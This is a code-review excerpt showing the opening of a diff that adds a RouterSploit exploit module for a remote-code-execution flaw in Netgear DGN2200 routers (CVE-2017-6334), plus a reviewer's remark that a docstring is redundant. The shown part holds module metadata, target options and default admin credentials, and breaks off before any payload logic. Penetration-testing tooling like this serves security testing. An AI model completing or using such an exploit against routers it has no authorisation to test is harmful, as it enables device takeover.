routersploit/modules/exploits/netgear/dgn2200_dnslookup_cgi_rce.py

```diff
@@ -0,0 +1,63 @@
+from routersploit import (
+    exploits,
+    print_status,
+    mute,
+    validators,
+    http_request,
+    shell,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploits Netgear DGN2200 RCE vulnerability through dnslookup.cgi resource.
+    """
+    __info__ = {
+        'name': 'Netgear DGN2200 RCE',
+        'description': 'Exploits Netgear DGN2200 RCE vulnerability through dnslookup.cgi resource',
+        'authors': [
+            'SivertPL',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/41459/',
+            'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6334',
+        ],
+        'devices': [
+            'Netgear DGN2200v1',
+            'Netgear DGN2200v2',
+            'Netgear DGN2200v3',
+            'Netgear DGN2200v4',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target Port')  # target port
+
+    username = exploits.Option('admin', 'Username')
+    password = exploits.Option('password', 'Password')
+
+    def run(self):
+        """
+        Method run on "exploit" or "run" command (both works the same way). It should result in exploiting target.
```

Comment:
This comment is redundant, describes behavior that is implemented in all exploits by design.